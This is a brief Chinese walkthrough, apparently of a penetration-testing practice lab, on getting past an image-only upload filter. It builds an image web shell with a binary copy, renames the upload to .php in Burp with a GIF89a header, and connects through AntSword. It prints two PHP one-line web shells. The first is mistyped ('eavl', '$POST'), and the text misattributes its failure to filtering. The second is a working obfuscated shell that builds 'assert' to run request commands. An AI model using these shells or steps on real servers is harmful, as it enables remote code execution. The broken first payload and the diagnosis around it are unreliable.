本文主要是介绍pte练习文件上传,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文件上传练习
题目做了过滤,只支持图片上传
这个时候就得上bp去改一改了,首先准备一张图片马,先个图片和一句话木马<?php @eavl ($POST['123']); ?>
cmd命令行中输入:copy tp.png/b + mm.php/a tpm.jpg生成一张名叫tpm.jpg的图片马,用编辑器打开图片马,后面有一句话木马就说明图片马生成成功。
上传图片马,bp抓包,将后缀改为php,图片头改为GIF89a,然后放包
上传成功,访问出现这样页面便是成功了
上传成功了,但蚁剑链接不上,我想可能是对内容做了过滤,于是将一句话木马做点绕过改为<?php $a=str_replace("abc", "", "aabcsabcabcsabceabcrt"); $a($_REQUEST["cmd"]);?>
重复上面步骤,最后上图
蚁剑连接找到key值
这篇关于pte练习文件上传的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
